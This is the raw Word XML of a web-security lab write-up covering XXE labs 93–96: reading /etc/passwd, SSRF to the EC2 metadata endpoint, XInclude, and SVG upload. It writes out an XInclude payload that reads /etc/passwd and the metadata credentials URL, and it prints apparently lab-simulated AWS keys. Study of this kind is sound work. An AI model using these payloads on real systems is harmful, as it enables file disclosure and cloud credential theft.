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CD5A" w14:textId="7E8F5115" w:rsidR="00F71D6D" w:rsidRDefault="00F71D6D" w:rsidP="00F71D6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XXE Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6409BEAD" w14:textId="77777777" w:rsidR="00F71D6D" w:rsidRDefault="00F71D6D" w:rsidP="00F71D6D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EA721B" w14:textId="1C8AC34E" w:rsidR="00F71D6D" w:rsidRDefault="00F71D6D" w:rsidP="00F71D6D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD01CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00BD01CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AB</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD01CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 93 </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00F71D6D">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exploiting XXE using external entities to retrieve files</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3380B84C" w14:textId="746C2C8B" w:rsidR="00BD01CE" w:rsidRDefault="00BD01CE" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Website contains functionality on </w:t>
      </w:r>
      <w:r w:rsidR="002F6C1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>checking items’ stock. It is done in POST /product/stock request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1448E0E1" w14:textId="2C44F66F" w:rsidR="002F6C1A" w:rsidRDefault="002F6C1A" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F6C1A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CAECA33" wp14:editId="698E8947">
            <wp:extent cx="5940425" cy="2738120"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="2206753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753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60D" w14:textId="77777777" w:rsidR="002F6C1A" w:rsidRDefault="002F6C1A" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73047BB3" w14:textId="075D64C9" w:rsidR="002F6C1A" w:rsidRDefault="002F6C1A" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As one can see, it contains XML data inside, having productID parameter inside. It might be vulnerable to XXE attack</w:t>
      </w:r>
      <w:r w:rsidR="007271DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. I have injected an XXE</w:t>
      </w:r>
      <w:r w:rsidR="00EF55D5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘xxe’ as new doctype to fetch for /etc/passwd file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71AD3B" w14:textId="43EE80E7" w:rsidR="00EF55D5" w:rsidRDefault="00EF55D5" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF55D5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD40339" wp14:editId="7477195A">
            <wp:extent cx="5940425" cy="2903855"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="86306903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903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BC44" w14:textId="26BF0C69" w:rsidR="00EF55D5" w:rsidRPr="00BD01CE" w:rsidRDefault="00EF55D5" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As a response, I received an error code 400 Bad Request AND the contents of /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB79064" w14:textId="77777777" w:rsidR="00BD01CE" w:rsidRPr="002F6C1A" w:rsidRDefault="00BD01CE" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F907467" w14:textId="6C2B1452" w:rsidR="00F71D6D" w:rsidRDefault="00BD01CE" w:rsidP="00BD01CE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD01CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB 94 </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00BD01CE">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exploiting XXE to perform SSRF attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="438CFBCA" w14:textId="785143C2" w:rsidR="00BD01CE" w:rsidRPr="005C2ADA" w:rsidRDefault="00EF55D5" w:rsidP="00EF55D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF55D5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0EC30" w14:textId="265DC6AD" w:rsidR="00F01CE2" w:rsidRDefault="00F01CE2" w:rsidP="00F01CE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obtain the server's IAM secret access key from the EC2 metadata endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA9EDD" w14:textId="63AF6001" w:rsidR="00F01CE2" w:rsidRPr="00F01CE2" w:rsidRDefault="00F01CE2" w:rsidP="00F01CE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00F01CE2">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AWS documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the IAM secret can be obtained at </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E24F0" w14:textId="3BF9F27D" w:rsidR="00EF55D5" w:rsidRDefault="00EF55D5" w:rsidP="00EF55D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So, let’s inject an XXE that will fetch </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="003C1BB0" w:rsidRPr="00180A70">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF7C67" w14:textId="4651109F" w:rsidR="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="00EF55D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF785FE" wp14:editId="628908C0">
            <wp:extent cx="5940425" cy="2945130"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="129151894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894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7D96" w14:textId="48D33BD5" w:rsidR="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="00EF55D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Great. I have received both AccessKeyID, SecretAccessKey and Token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FEE354" w14:textId="77777777" w:rsidR="003C1BB0" w:rsidRPr="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "Code" : "Success",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65640DB7" w14:textId="77777777" w:rsidR="003C1BB0" w:rsidRPr="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "LastUpdated" : "2024-03-21T02:57:32.891627808Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F1D97" w14:textId="77777777" w:rsidR="003C1BB0" w:rsidRPr="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "Type" : "AWS-HMAC",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF0A37" w14:textId="77777777" w:rsidR="003C1BB0" w:rsidRPr="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "AccessKeyId" : "0OJrRNMYLje0JWEbEWnG",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C7AA15" w14:textId="77777777" w:rsidR="003C1BB0" w:rsidRPr="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "SecretAccessKey" : "</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FP0uttsvXNFrwyGqql1bYq3xadhzRqsSTBDuhajp</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4DA1E" w14:textId="77777777" w:rsidR="003C1BB0" w:rsidRPr="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "Token" : "6kJAkPMfl6g1djPZiaT3gNNPFBSGowNElG3JrMiqVNGWrLUpF4lcK4e64bDmDX7kXfNg412NVtFtc2Dr8DPlC2rUbr7cTdD4wNcPwsBimO9ONugG2O6uCYxgR6M2kHUU4BjPtX2wAg189CXs2AiW0sTlRiN1xEbJBcaIBfE7qUHlWHkNVrOhrvm2GjL0Xmhh06me1RaVOLZdMHHZS6QlkEIdcHmFcZujpjauqFy3nSk1fbhyLga4NtuZDV1xibHg",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4424A3D8" w14:textId="46C09FB8" w:rsidR="003C1BB0" w:rsidRDefault="003C1BB0" w:rsidP="003C1BB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  "Expiration" : "2030-03-20T02:57:32.891627808Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7634C6EA" w14:textId="77777777" w:rsidR="00BD01CE" w:rsidRDefault="00BD01CE" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA977F4" w14:textId="2D7B3CAD" w:rsidR="00BD01CE" w:rsidRDefault="00BD01CE" w:rsidP="00BD01CE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F441F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LAB 95 </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00BD01CE">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exploiting XInclude to retrieve files</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5819840D" w14:textId="55A76476" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The goal is to obtain /etc/passwd contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657B158" w14:textId="30BCDA90" w:rsidR="00BD01CE" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At first sight, this lab seems not to be vulnerable to XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD9586" w14:textId="761A5A9F" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F441F3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C137E9E" wp14:editId="018B5649">
            <wp:extent cx="5940425" cy="2027555"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="97314428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428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F8D1" w14:textId="52E25AE6" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, I tried to replace one of the parameters’ value to XML arbitrary type and received the following error message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F3D31" w14:textId="5B3F4DDC" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F441F3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269AD4F4" wp14:editId="385DCA79">
            <wp:extent cx="5044098" cy="2045677"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="6721111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111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09" cy="20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8C22" w14:textId="01E5AEDE" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So, the XML entity was accepted, but there is sort of protection present. This could be bypassed by introducing XInclude which is a part of XML specification. It can be done in following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D915C9D" w14:textId="66ECFE6A" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F441F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;foo xmlns:xi="http://www.w3.org/2001/XInclude"&gt;&lt;xi:include parse="text" href="file:///etc/passwd"/&gt;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7F8D3" w14:textId="7C96B07E" w:rsidR="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00BD01CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F441F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:noProof/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BFDC6E3" wp14:editId="4A97B5BB">
            <wp:extent cx="5400923" cy="2684585"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1336111621" name="Рисунок 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11621" name="Рисунок 1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117" cy="26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2AF" w14:textId="5D6CF71D" w:rsidR="00F441F3" w:rsidRPr="005C2ADA" w:rsidRDefault="00F441F3" w:rsidP="00F441F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F441F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bingo!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> I can see /etc/passwd/ contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46150DBD" w14:textId="77777777" w:rsidR="00F441F3" w:rsidRPr="00F441F3" w:rsidRDefault="00F441F3" w:rsidP="00F441F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51442A35" w14:textId="7259B273" w:rsidR="00BD01CE" w:rsidRPr="00BD01CE" w:rsidRDefault="00BD01CE" w:rsidP="00BD01CE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD01CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB 96 </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00BD01CE">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exploiting XXE via image file upload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48D41518" w14:textId="77777777" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6586">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01A723" w14:textId="7266B247" w:rsidR="000D6586" w:rsidRDefault="00F441F3" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6586">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal is to </w:t>
      </w:r>
      <w:r w:rsidR="000D6586" w:rsidRPr="000D6586">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obtain /etc/hostname file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33431495" w14:textId="4C05A5EE" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apache Batik renders SVG files. SVG is an XML based format, so let’s create an SVG picture with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CA5C1" w14:textId="722DF0D8" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6586">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677D957D" wp14:editId="2E0EE22F">
            <wp:extent cx="4232031" cy="994335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1989295907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5907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987" cy="9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A80C" w14:textId="2564E542" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now, I will upload this .svg image as my profile picture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC3D4C" w14:textId="780D5207" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6586">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3210DE9D" wp14:editId="309AFE21">
            <wp:extent cx="2983523" cy="2559354"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="72386833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833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539" cy="25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F1B" w14:textId="6B79F1B0" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6586">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4039D610" wp14:editId="05D5F7A9">
            <wp:extent cx="2934109" cy="771633"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2141839787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39787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E8BD" w14:textId="29ABD56A" w:rsidR="000D6586" w:rsidRDefault="000D6586" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The comment was added successfully and I can see a mini avatar in front of my name, let’s open it in new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575C9D6" w14:textId="3F4755FF" w:rsidR="000D6586" w:rsidRDefault="005C2ADA" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2ADA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EBAF200" wp14:editId="193F8ABD">
            <wp:extent cx="712230" cy="134815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1582860698" name="Рисунок 1" descr="Изображение выглядит как Шрифт, белый, типо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60698" name="Рисунок 1" descr="Изображение выглядит как Шрифт, белый, типография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3025" cy="1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875" w14:textId="64E06B7A" w:rsidR="003D0C08" w:rsidRDefault="003D0C08" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is the hostname I was looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B7A47E" w14:textId="096C86A5" w:rsidR="003D0C08" w:rsidRDefault="003D0C08" w:rsidP="000D6586">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hostname: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C08">
        <w:rPr>
